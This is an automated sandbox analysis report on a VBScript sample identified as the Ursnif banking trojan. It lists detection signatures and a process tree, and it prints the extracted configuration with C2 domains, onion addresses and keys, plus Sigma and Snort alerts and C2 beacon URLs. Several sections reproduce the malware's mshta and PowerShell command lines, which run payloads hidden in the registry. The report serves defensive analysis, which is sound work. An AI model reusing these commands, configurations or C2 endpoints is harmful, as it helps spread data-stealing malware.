
Windows Analysis Report 345678.vbs

Overview

General Information

Sample Name:345678.vbs
Analysis ID:481077
MD5:9e6b216f5112b583f035ac621c78ea4e
SHA1:8e1636abf1eb1dd966dce2b92fd44a1d9a3e32d3
SHA256:cbf23e2c51909c02fc3898b4fb078cb1fc08935874add1c045c592096ff18379

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Uses nslookup.exe to query domains
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Allocates memory in foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Launches processes in debugging mode, may be used to hinder debugging
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3868 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\345678.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 5808 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 6000 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 6072 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 2896 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 4612 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • WmiPrvSE.exe (PID: 6716 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)
  • WmiPrvSE.exe (PID: 6844 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • mshta.exe (PID: 6556 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6948 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 7060 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7072 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 7080 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7100 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • RuntimeBroker.exe (PID: 4016 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 3208 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 6256 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=", "c2_domain": ["art.microsoftsofymicrosoftsoft.at", "r23cirt55ysvtdvl.onion", "fop.langoonik.com", "poi.redhatbabby.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "apr.intoolkom.at", "fgx.dangerboy.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "5", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(5 of 36 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
21.3.rundll32.exe.50ba4a0.1.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
21.3.rundll32.exe.50ba4a0.1.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
21.3.rundll32.exe.5168d48.2.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
21.3.rundll32.exe.51394a0.3.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Encoded IEX
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6556, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6948
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6556, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6948
Sigma detected: Mshta Spawning Windows Shell
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6556, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6948
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6948, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline', ProcessId: 7060
Sigma detected: Suspicious Rundll32 Activity
Source: Process started | Author: juju4, Jonhnathan Ribeiro, oscd.community | Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 2896, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 4612
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6556, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6948
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132757666291999114.6948.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell run code from registry
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6556, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6948

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e | Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6P | Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/t | Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw | Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT | Avira URL Cloud: Label: malware
Found malware configuration
Source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=", "c2_domain": ["art.microsoftsofymicrosoftsoft.at", "r23cirt55ysvtdvl.onion", "fop.langoonik.com", "poi.redhatbabby.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "apr.intoolkom.at", "fgx.dangerboy.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "5", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}
Multi AV Scanner detection for domain / URL
Source: atl.bigbigpoppa.com | VirusTotal: Detection: 8%
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E53276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,21_2_00E53276
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdb@ source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdbXP+s source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000001.00000003.535291067.000001763BDE4000.00000004.00000001.sdmp, fum.cpp.1.dr
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05591802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,21_2_05591802
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05581577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,21_2_05581577
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055714A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,21_2_055714A0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05586E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,21_2_05586E4E

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49787 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49787 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49788 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49788 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49789 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49789 -> 185.251.90.253:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.251.90.253 80
Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: global traffic | HTTP traffic detected: GET /KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
